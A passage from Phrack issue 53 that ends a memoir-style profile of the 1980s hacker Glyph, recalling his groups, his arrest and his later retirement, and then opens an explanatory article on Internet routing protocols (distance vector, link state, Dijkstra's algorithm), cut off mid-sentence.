3 P R O P H I L E -----------------[ Personal Handle: Glyph Call him: Yesmar Reach him: glyph@dreamspace.net Past handles: The Raver (cDc), Necrovore (Bellcore), Violence (The VOID Hackers) Handle origin: Egyptian mythology: glyph \'glif\ n [Gk glyphe^- carved work, fr. glyphein to carve -- more at CLEAVE] (ca. 1727) a symbol that conveys information nonverbally (e.g., heiroglyphics). Date of birth: Late 60's Age at current date: As old as the lunar landing Height: 5'10" or so Weight: Skinny (I hate fat people) Eye color: Blue Hair color: Brown Computers: Started with a TeleVideo 920 dumb terminal and worked my way up to a small collection of SGI and NeXT boxes. Sysop/Co-Sysop of: Nothing that you've ever heard of (limited lifespan hacker boards on Prime superminis and VAX mainframes located on the X.25 global data networks). Admin of: Go look in the InterNIC databases yourself. URLs: I am not going to support the World Wide Waste of time in my Pro-Phile. I first started playing with computers when I was nine years old. I started by learning FORTRAN on a Prime supermini at the local university where my parents worked. Later I learned BASICA on the original IBM PC (what hulks those were). Then a shipment of Apple ][+'s arrived and I learned about the joys of warez. Ultima ][, Wizardry, and all the rest kept me busy for a couple of years. I never had my own computer, so I had to hike down to the university computer center to frotz around. Around 1984 I was loaned a TeleVideo 920 dumb terminal and a 300 baud USR modem. I used it to connect to the university's PRIME cluster. A hacker was born. I had a legitimate account, but managed to obtain additional user IDs by exploring the filesystem. I had also begun tinkering around with the telephone network by this time. Later I got an Apple //c and eventually a //gs. These computers got me back into the warez scene. One month I got a $500 phone bill. The next month the phone bill was back to $0. The only difference was that the warez intake had nearly doubled. Indeed, I had learned about codes. I spent a lot of time calling warez boards around the country. Ultimately I tired of the pirate scene, mainly because of all the inane bickering. I also stopped phreaking because I had gotten scared. I disappeared for a year or so. Eventually I made a comeback. I wanted to continue to play with computers and networks, but I wanted to avoid the phreaking scene. I decided that I needed a name. I decided to call myself 'The Raver' after Turiya Raver from _The Chronicles of Thomas Covenant the Unbeliever_. (Note: the rave scene was unknown in the U.S. at the time). I spent a lot of time calling hack/phreak boards and learning. I discovered that I really liked this new communications medium known as tfiles: files containing pure ASCII text. Tfiles could be about hacking, phreaking, anarchy, or best of all, DEAD COWS WHO RULE THE WORLD. Yes, I had discovered a rare beauty on the BBS landscape of the 80's: cDc -- the Cult of the Dead Cow. I was entranced. These people of the cow were like digital punks, espousing their wild views without a single care. I was instantly hooked. I started writing tfiles. Before long, I found myself invited to join the forces of the Cow. How could I decline Bob and Elsie? So it came to pass that I contributed to what I consider a class movement in the telecom scene of the late 80's. cDc fulfilled my need to communicate and hang with open-minded people in a BBS context. In time, my desire to hack started to come back. At first it was merely an 'itch' to poke at a system. Later it developed into a full-blown need to get into everything I could. It was around this time that I started exploring TELENET and the global X.25 data networks. I met ParMaster, the original members of Bellcore, and LOD/H on altger in Munich. I was hooked. Par and I, considering ourselves lame at the time, formed a group named XTension. The group flourished on the European networks. Eventually half of XTension were invited to join Bellcore. This was the first time any of us had experienced a rift in friendship over the digital medium. It was a painful learning experience. I would not talk to Par again for many years. In the meantime, I began working at learning even more under the wings of Bellcore. I hacked Primes for Bellcore. Under the tutelage of Chippy I discovered the ways of UNIX and TCP/IP networking. I changed my name to Necrovore in order to make clear the changes that had occured. The name comes from the fact that I was very much into death metal at the time. Naming myself after the 'Eater of the Dead' seemed like a very reasonable thing to me at the time. (God, what was I thinking!?) At any rate, the Mentor of LOD and I used to pick fights with each other online across the world, so it isn't surprising that 'Necrovore' found its way into a Steve Jackson Game's GURPS Supers module as one of the super villains. Heh. Eventually Bellcore fell apart, as did so many groups. It became 'cool' and then too many people were invited to join, and then the trust fell apart. If there is a lack of trust, how can work be accomplished? Bellcore was done. It depressed me a lot because LOD continued strong. Was what I had fought for worthless? I thought not. At that time I decided that the days of Big Groups were over. Now it was time for the Small Cell. The VOID Hackers were created by myself and The Usurper, now Thrashing Rage, a fellow ex-Bellcore member. We recruited Dr. Psychotic, a class assembly language hacker, and The Scythian, another hacker with a famous past, and started in after Primes and VAXen around the world. I wrote a lengthy series of articles on hacking Primes and submitted it to 2600. I got yelled at later by TK and KL for not submitting it to Phrack. To know the truth, I didn't think it was good enough for Phrack, which had been the soul of the scene since its inception. I never heard back from 2600. (Go figure.) The VOID Hackers surpassed my wildest expectations. We hit systems across the planet. We had hundreds and hundreds of systems at our beck and call. It could only get better, or so I thought. Imagine my surprise then, one day, when my mom picked me up from school and told me that there were 'security people' at the house right then. 'FUCK,' I thought. Fuck, indeed. I was popped at age 20. I managed to avoid a multiple felony rap and retired right away. I used contacts to make it clear to government intelligence people and others that I was finished. I went to university and majored in English, then Anthropology, and ultimately settled on Computer Science. Instead of criminal hacking, I delved into hacking from the MIT perspective. I explored the UNIX system and sharpened my programming skills. Eventually I left the protected world of academia and made my way into the computer industry. With the heavy advent of the Internet I reappeared on the scene as glyph. It was interesting running into old friends (and enemies) and meeting new hackers on the scene. I went to several cons and continued to frolic in the security domain. By this time, however, I had pretty much ceased to engage in criminal hacking, spending my time instead developing security tools. Now I am completely retired. You may still see me as glyph from time to time, however. Undoubtedly, there are more of 'me' out there. grep. It's been a long, strange ride. I'd do it all over again if I wasn't so old. 8) ----------------[ Favorite things Women: Australian chicks rule. Cars: I don't drive. I might if I could recompile traffic algorithms, however this doesn't seem all that likely. I definitely would not drive a BMW. There are too many of those around as it is. I used to drive a skateboard. That was a long time ago, though. Brains and computers are still good to drive, however. Vrooom. Foods: Shrimp Vindaloo, please. Hot and spicy ethnic. Non-processed. Alcohol: Fine Italian Chianti. Vodka. Exotic imported beer. More Vodka. Music: Scorn, ClockDVA, My Life With the Thrill Kill Kult, Coil, Slint, Killing Joke, Chrome, Kraftwerk, Jane's Addiction, Zillatron, John Zorn, Praxis, Lard, Meat Beat Manifesto, Eat Static, Suede, Bill Laswell, Sepultura, Grotus, Mr. Bungle, Ozric Tentacles, Pink Floyd, Frontline Assembly, Dayglo Abortions, Dead Kennedys, Metallica, Slayer, Kreator, and lots and lots of other stuff. Movies: The Stepford Wives, Invasion of the Body Snatchers, Brazil, Marathon Man, Blade Runner, anything by Akira Kurosawa, Memoirs of An Invisible Man, The Usual Suspects, Aeon Flux, Heavy Metal, Light Years. Authors: Jorge Luis Borges, J. R. R. Tolkein, Kurt Vonnegut, Jr., Sun Tzu, Stephen R. Donaldson, H. P. Lovecraft, Gabriel Garcia Marquez, Clark Ashton Smith, Umberto Eco, George Orwell, Thomas Ligotti, Douglas Adams, Robert Anton Wilson. Turn Ons: Intelligence, algorithms, open mindedness, guitars, see "Women". Turn Offs: Arrogance, stupidity, shallowness, closed mindedness, media whoring. ----------------[ Passions Music. Listening to it as well as making it. Reading and writing. Programming algorithms and data structures. I have this rock that I found in the creek next to the elementary school I used to attend when I was in 3rd grade. The rock weighs over 7 pounds and is shaped like a pebble. I hefted it from the waters and proclaimed it as 'Herman', my pet rock. I've had it ever since I was 9 years old. That was the same year I first experienced computers. Holding on to this rock all these years has definitely been a passion of mine. Slowly becoming a social recluse. I actually think this is healthy for me. ----------------[ Memorable experiences Watching Wargames for the first time. Yes, I admit it. It affected my life. Being lame and creating the group XTension with ParMaster. It was the first group for both of us. We thought it was pretty cool at the time. Backdooring PRIMOS Rev. 22.0... yes, the actual source code repository. 8) Trashing. Hiding in the dumpster while the janitor dumped trash on my head. Hacking Europe, South America, and parts of Asia. Globe travelling... Altger (NUA 026245890040004). Sigh. I liked it a lot better than irc. SummerCon '95. Other than knowing The Usurper and Hyperminde, and having Byteman visit from New Jersy for two weeks, I hadn't ever really met other real, live hackers before. Very cool. chuck and edward. The l's. Bastards. 8) Cytroxia on acid. Way to go, Danny. The great 7-day Alliance Teleconference. I remember waking up to blasts of DTMF tones and raucous laughter. TELENET. PAD to PAD. NUIs. TELENET THINGIES!!!1!! DNIC scanning. That VAX cluster. Hey Par, remember *that* VAX cluster? PROTEON. XTension being rent asunder as half the members were invited into Bellcore and the other half being politely told to fuck off. Novation AppleCat modems. Watching a CERT advisory happen--from the inside. It was advisory CA-89.03. Hiya, Chippy! Where are you? Social engineering for the first time. It worked, go figure. The Richard Sandza teletrial. Getting busted. I missed SummerCon '89 as a result. From Phrack #28 PWN: Violence and The Scythian: "We got busted by SoutherNet, but we'll be there!" Backdooring a major network entity for the first time--the exhilheration. PC PURSUIT. Oopsy. Discovering I was published in 2600--almost 7 years after the fact! Hey, I got my free issues and t-shirts! Fuck QSD channel. Outdials. The TCP/IP Drinking Game. Version 1.0. SummerCon '96 in D.C. Talk about a quick buzz. NeTTwerk gave the speech. BioH, .mudge, ReDragon, myself, and a few others drank, and drank, and drank. A good time, to be sure. If anyone reading this has video footage of the event, please mail me. Backdooring a major VAX application using a hex editor. Jamming on Control-C and falling through the login command processor into old Primes. ROTFL. Hacking from Dataphones in Boston. My first buffer overflow. I remember talking on the phone with .mudge as I worked out the details. Falling in love. Falling out of love. ----------------[ People to mention In no particular order: Dr. Who, BioHazard, Alhambra, .mudge, Dr. Cypher, Asriel, Bill From RNOC, _*Hobbit (still reading flammage after all these years), Swamp Rat, N8, The Dictator (AKA Dale Drew), Frankengibe, The Mentor, FryGuy, Garbage Heap, The Scythian, Mr. Xerox, MasterMicro, 0x486578, Tim N. (love your code), Bika (dig that hair), Grave45, Shewp, SkyHook, Blade Runner, Mycroft, Shatter, Sir Hackalot, Nirva, Crimson Death, Par, Taran King, Thingo It, Knight Lightning, Enkhyl, CheapShades, The Force, Byteman, The Leftist, Chippy (la la la), Mad Hacker (the *real* one), The Usurper/Thrashing Rage, Kewp (NOT!), Touch Tone (My voice isn't *that* hiiiigghhhh!!! CONNECT 1200), The Urvile/Necron 99, Hyperminde/Dr. Psychotic (Remember, until there is a cure for Assembly Language Brain Fry, there will always be the N.C. Home for Deranged Programmers), ReDragon, B, Route, GyroTech, Epsilon, Control-C (thanks for all the prank calls!). Lastly, I *must* mention that cool ass M.I. guy who tried to bust me--you were rad! (It was a truly good game. You told me to go to college, and I did. You also taught me not to under-estimate the enemy, because I did.) ----------------[ Boards to mention Elite Boards: Phoenix Project, Digital Logic, Pirate-80, Speed Demon Elite, the various Metalland systems, The Metal AE, Demon Roach Underground, upt.org, The Polka AE, The Lost City of Atlantis, Lunatic Labs, The Dead Zone, Ripco, Broadway Show/Radio Station, The Central Office, The Missing Link, Lutzifer, The Works, upt.org, and the L0phT BBS. There are undoubtedly more, but these are the ones I remember to this day. Local Boards: Never a fan of 'local' boards, there are only two that I can recall as being k-interesting to any degree: The Padded Cell and Pandemonium, both of which were in the 919 NPA. ----------------[ Quotes Gimme sum PR1MEZ!1!! May the Forces of Darkness become confused on the way to your house. WERE THE SEKRATARIES THAT R00L CYBERSPACE WE SKRIBBLE GFILES IN SHORTHAND HEY THE RAVER EYE HEAR U PACK A MEAN LUNCHBoX HEY ITS THE RAVER 0F CDC @#$@# HEY RAVER OF CDC @$@#$ RAVER COME OVER HERE AND POSE WITH ME AND GHEAP F0R A PH0T0 I CANT BELIEVE EYEM ON IRC WITH THERAVER OF CDC @$)%(&@*($&#* HEY LADYADA, IM ON IRC WITH THE RAVER OF CDC CAN YOU BELIEVE IT?! IM ST00PID NIGGAH oF M0D I don't think that was really SN, but it was funny as hell anyway. * glyph is away - vomiting binary - all Lame messages will be ignored. I actually vomit hex, but that always seems to break down into binary if it sits on the floor for a while When I was a kid, nobody ever picked me to play dodge ball, kick ball, or whatever. If I was picked, I was always last or second to last. You can imagine what a pleasure the following was to read: WE PICK GLYPH WE ALREADY HAVE GLYPH ASRIEL oh fuck well at least we have knuth Other quotes have been lost to the vestiges of time. ----------------[ The future of the computer underground I see a future without me. ----------------[ The forgotten pro-phile question ...And now for the [once] regularly taken poll from all interviewees. Of the general population of phreaks and hackers you have met, would you consider most, if any, to be computer geeks? No. Most phreaks and hackers that I have met are not geeks. They are more likely to be utter freaks, however, but not nerds or geeks. Geeks lack social skills. Phreaks and hackers have a definite social world that extends beyond phone switches and computer networks. Thanks for your time, Yesmar. "No problem." ----[ EOF ---[ Phrack Magazine Volume 8, Issue 53 July 8, 1998, article 05 of 15 -------------------------[ Introduction and Overview of Internet Routing --------[ krnl ----[ Routing Overview: The process of routing can be quickly summarized as a node finding the path to every possible destination. Routing is present in everything from layer 1 (the physical layer) on up. The routing that most people are familiar with, however, occurs at layer 3 (the network layer) and as such, we will only reference layer 3 (and more specifically) Internet Protocol (IP) routing in this document. Protocols for exchange of routing information connect multiple routers around the world to provide them with a common view of the network through their heterogeneous, though generally consistent routing tables. Routing tables store all information necessary for the router to reach every destination on the network irrespective of size (i.e. the network could be j.random LAN with one ip router and two hosts off of an ethernet port or it could be the Internet proper). ----[ Routing Protocols: There are a wide variety of routing protocols used to contribute to the routing tables across a network. Protocols such as BGP, OSPF, RIP and ISIS help to convey a correct and coherent picture of the network to all network switches (routers). ----[ Routing Goals: You can imagine that if each router has to store information that would allow it to reach every destination on the network, there is the possibility for it to amass a large routing table. Large routing tables are difficult (and sometimes impossible) for routers to process because of physical constraints (cpu, memory or a combination). Therefore, we would like to minimize the routing table space without sacrificing the ability to reach every destination on the network. For example, if the router is connected to the Internet via one DS1 link to another router, the router could store routing table information for each destination on the Internet or it could just default non-local information out that serial link. What defaulting means is that if the router does not have a specific entry in its table for the destination that the packet is trying to find, it sends it out the default link. The router towards which a router sends defaulted packets is sometimes called the 'gateway of last resort'. This simple trick allows many routing tables to save a number of entries on the 30th order of magnitude. Routing information should not be exchanged between routers in a spurious fashion. Frequent churn in the routing table puts unnecessary stresses on the scare memory and cpu of any given router. Information propagation should not interfere with the forwarding operations of the router. Though this means that you should not send routing updates every nanosecond, it does not mean that routing information should only be exchanged and updated weekly. One of the important goals of routing is that it provide the host with a table which accurately reflects the current status of the network. The most important aspect of a router's operation is sending packets from input to correct output. Misrouting packets could cause a loss of data. Routing table inconsistencies could also cause routing loops whereby a packet is passed between two adjacent interfaces ad infinitum. It is desirous for routers to have quick convergence. Convergence can be informally defined as a metric which gauges the speed at which routers arrive at a consistent view of the network. It would be ideal to have infinitesimal convergence times because that would ensure that each router on the network can accurately reflect the current topology even after a drastic change (link failure). When the network is changing, each router must propagate data which will aid other routers in converging to the correct picture of the network status. Problems with quick convergence are found in the routing updates. If a link is flapping (changing line status from up to down) rapidly, it can generate numerous installation and withdrawal requests. Therefore, that one link can end up consuming the resources of every router on the network because the other routers are forced to install and withdraw the route in rapid succession. While convergence is an important goal of routing protocols, it is not a panacea to network woes. ----[ Distance Vector Routing Distance vector routing protocols distribute a list of tuples to all of the router's neighbors. These tuples assign a cost to reach every other node of the network. It is important to note that this routing information is only distributed to routers which are assigned as neighbors to the originating router. These neighbors are often physical, but can be logical in the case of eBGP multihop. That cost is the sum of the link costs for the router to reach a destination. Routers periodically send their neighbors distance vector updates; the neighbor then compares the received distance vector to its current distance vector. If the received values are lower, the router sends output to the destination in the distance vector over the link that it received the vector over. The count to infinity problem is a problem with many distance vector implementations. We will assume that all links have a unit cost and that each hop corresponds to a unit. For example, if router X is connected to router Y and router Y is connected to router Z, we can demonstrate this problem (see fig 1). Y knows a 1 hop path to Z and X knows a 2 hop path to Z. Assume that link YZ goes down and the cost of that route is increased to infinity (fig 2). Now, Y knows an infinite cost route to Z because it knows the link is down so it propagates this distance vector to X. Suppose X has sent an update to Y which advertises a 2 hop distance vector. Now, Y will think that it can get to Z through X, so it sends X an update that says it can get to Z in three hops (fig 3). Note that X has no idea that the distance vector being advertised to it was originated from X. This is a serious flaw in distance vectors. In their unmodified form, they do not contain the full path information that the route has traversed. As illustrated above, the router alternates states of advertising a path to Z and advertising infinity to Z. They keep this exchange up forever or until they have reached some internally defined infinity count (say 15 as in the case of RIP). Count to Infinity problem: X--------------------Y--------------------Z Y:1 X:1 X:2 Z:2 Z:1 Y:1 [ fig 1 ] All links are up, below each node we note the destination and hopcount from each respective node. X--------------------Y--------* *---------Z Y:1 <------------- Z:infinity Z:2 -------------> X:1 [ fig 2 ] The link Y - Z breaks. Node X advertises Z:2 to node Y. X--------------------Y--------* *---------Z Z:infinity(frm Y) -> X:1 Y:1 <------------- Z:3 [ fig 3 ] Node Y sends its Z distance vector to X _before_ it recieves node X's infinity. Once node Y receives node X's infinity, it sets its distance to infinity. A path vector is an easy way to defeat the count-to-infinity problem. Basically, each distance vector also includes the router path that it traversed (fig 4). The router rejects an update from its neighbor if the path included in the update includes the router receiving the update (fig 5). The Border Gateway Protocol (which is used to exchange routing information between Autonomous Systems on the Internet) incorporates the path vector to stop the count-to-infinity problem. Obviously, you have to incorporate more information in the routing table if you want to include the AS path information that the route has traversed. The designers of BGP decided that it was optimal to sacrifice storage space and processing power for the robustness that the path vector affords the routing protocol. Path Vector Solution: X--------------------Y--------------------Z Y:1 (Y) X:1 (X) X:2 (YX) Z:2 (YZ) Z:1 (Z) Y:1 (Y) [ fig 4 ] All links are up, below each node we note the destination, hopcount and path vector from each respective node. X--------------------Y--------* *---------Z Y:1 (Y) X:1 (X) Z:2 (Y Z) Z:infinity [ fig 5 ] The link Y - Z breaks. Node Y knows to ignore Xs advertisement of Z because Y is the path vector. The avoids the count-to-infinity problem. Another way to counter this problem is the split horizon. Basically, this means that a router shouldn't advertise a path to a neighbor if that neighbor is the next hop to the destination. This solves the problem presented in the example above because the path to Z from X through Y would not have been advertised to Y because Y is the neighbor _and_ the next hop to the destination (Z). A variation called split horizon with poisonous reverse has router X advertise an infinite cost to get to destination Z. Under a split horizon, router X would not advertise that it could get to router Z. ----[ Link State Routing A router using a link state routing protocol distributes the distance to its neighbors to every other router on the network. This allows each router on the network to make a routing table without knowing the full cost to the destination from any one source. The problems of loops are avoided because each router contains the full topology of the network. Basically, the router makes a 3 tuple containing the source router (itself) the neighbor and the cost to its neighbor. Therefore, if router A is connected to Router B over a link of cost 3 and router A is connected to router C over link cost 5, then router A would advertise the Link State Packets (LSPs) and to all routers on this network. Each router on the network would evaluate all of the LSPs that it receives and calculate a shortest path to every destination on the network. Obviously, the LSP is an integral part of the convergence process. If someone could inject false LSPs into the network, it could result in misrouted information (a packet taking a longer path than it should) or even in the blackholing of a router on the network. This is not necessary a malicious attack of a network, however. Router C could advertise a link to its neighbor D with the 3 tuple and then withdraw the announcement when the link goes down. Unfortunately, if the LSP advertising the link having an infinite cost arrives before the LSP advertising the cost of that link being 6, the routing table will not reflect the topology of the network and will be in that state until another LSP comes to correct the problem. To combat this, a sequence number is introduced into the LSP. Therefore, all of the routers on the network would initialize their sequence number to some starting value and then start advertising their LSPs. This solves the above problem in that the LSP advertising the link of infinite cost would have a higher sequence number than the LSP advertising the link as having cost 6. Some problems encountered when using sequences numbers are finite sequence space, sequence initialization, and aging. It is in the best interest of a robust link state protocol needs to protect its LSPs as well as choose a sequence space which is sufficiently large to accommodate updates. The sequence space that the LSPs can use is set to some finite value. Therefore, when the sequence numbers reach the top of the space, they must wrap around towards the smallest sequence number. This presents a problem because when a router compares link state updates, the greater sequence number takes preference. To combat this problem, you can define a maximum age of the LSP. Therefore, if you have not received an update in X ticks, you discard the current LSP information and wait for a further update. It must be noted that this invalidates the path information to a destination. For example, if router Y advertises a cost to its neighbor router Z where router Y is connected by one link to a meshed network, when the link between the mesh and router Y breaks, the other routers in the mesh have preserved link state information that will allow them to find a path towards Z. If they receive no updates in MAX_AGE, then they will assume that the link to Y is unreachable. This will allow each router to converge its table and allow it to advertise an infinite LSP for Y and Z. Sequence initialization is also an important facet of this problem. Say router Y crashed and is rebooting while the network is recalculating paths to it. When it starts its link state protocol back up, it must somehow indicate that it needs to reinitialize its sequence number to the last number it gave all of the other routers to allow for coherence. Therefore, it can announce paths with a sequence number in a special "initialization set". This initialization set will tell the other routers that this router needs the sequence where it left off. This is the "lollipop sequence" idiom. The sequence space really resembles a lollipop in that the normal sequence number keep churning around the finite sequence space while reinitialization takes place in a short linear sequence space (comparable to the stick :). Great pains are taken to ensure the integrity of LSPs. In fact, this entire routing algorithm depends on the LSP being digested in a coherent method to guarantee that each router has the correct view of the network topology. The question still remains how the root node router computes the distance to each destination. Because of the general nature of a link state protocol, you have various nodes of the network advertising the distance to get to their neighbors to every other node on the network. Thus each node has a collection of neighbor distances from various routers on the network. The routing table is basically 'grown' outward from the root node to all of the network extremities. This will be explained in a slightly rigorous fashion in the next section. ----[ Dijkstra's Algorithm This algorithm is a simple and elegant way to determine network topology. Basically, there are two distinct sets of destinations on the network. Destinations in set K are known routes for which a shortest path has been computed. Destinations in set U are routers for which the best path to that router is not currently known. In this set, paths are being considered as candidates to be the best path to that destination. To start off, add the current node p into the set K. Then add all of its neighbors into the set U with path/cost associations. If there is another path to one of the neighbors in the U set, then choose the path which costs the least. When the neighbors N* are added to U make sure that they indicate the cost through p as well as p's ID . Once this has been done for the set U, then pick the neighbor n to p which has the smallest cost to reach p. This is assuming that the neighbor has not already been installed in K. This algorithm stops when set U is equivalent to the empty set. When set U is null, it is implied that all destinations are in set K and have the shortest cost from the root node P on which this algorithm is running. Note, that each step evaluates adds ONE neighbor into K. That neighbor is the router with the smallest cost to reach p. ----[ Distance Vector vs. Link State We are left with these protocols like BGP which uses path vector and OSPF which uses link state. Why do they occupy such orthogonal space? When a link state protocol is working correctly, it guarantees that there will be no routing loops in the network. The link state protocol also guarantees fast convergence when there is a change in the topology of the network because the link state is distributed on a flat routing space. Since link state protocols contain these inherent advantages, why do protocols like BGP chose to employ the path vector approach? Taking a cross-section of routing protocols that are employed on the internet, one finds that the majority of large providers use OSPF to resolve routing information on their internal network and BGP to talk to other distinct networks (or autonomous systems) at their borders of administration. What suits BGP as an external protocol and OSPF for an internal routing protocol? One issue, which will be discussed in the next section, is hierarchy. BGP provides a mechanism for a routing hierarchy which enables it to greatly reduce the space of its table. OSPF, which is a link state protocol, provides a flat routing table whereby any internal router knows the full hop by hop path to any destination within the autonomous system. Furthermore, distance vector protocols understand that different areas can have different views of the network where link state protocols require that each node independently compute a consistent view of the network. This saves the DV protocol the overhead of maintaining a correct LSP database. BGP also has another 'advantage' in that it is layered on top of the Transmission Control Protocol (TCP). Therefore, in the 'best-effort' service of IP networks, BGP has assurance (to the level that TCP can guarantee) that routing information will be propagated. Whereas, you can (or should) be able to govern the status of your internal network, the nebulous exterior past your border routers confers no delivery guarantee on your routing information. Each type of routing algorithm is suited for its function. Link State protocols provide the quick convergence that is essential to an internal network while distance vector protocols provide external reachability. Hierarchy is not something that is inherent in distance vector protocols, but the implementation of a hierarchy has made BGP a widely used exterior gateway protocol. ----[ Routing Hierarchy Routing hierarchy is an oft fought debate that borders on religion. There are constantly questions about how hierarchy should be implemented (if at all) in the free form state of the current global network. Hierarchy imposes a tree of authority with the overall authority at the top of the tree and branching down to regional authorities, local authorities ad infinitum. Hierarchy simplifies routing because if a destination is not locally routable (or under your section of the tree). You can iterate up towards the top tree to try and deliver that information. As you move towards the top, the routing information contained in the routers becomes less and less specific until you reach the root node which is the least specific. It does, however, know how to route information to every possible destination on the network. It may help you to envision the hierarchy of the telephone network (built under one collective). If a call cannot be placed within a central office, it is handed to either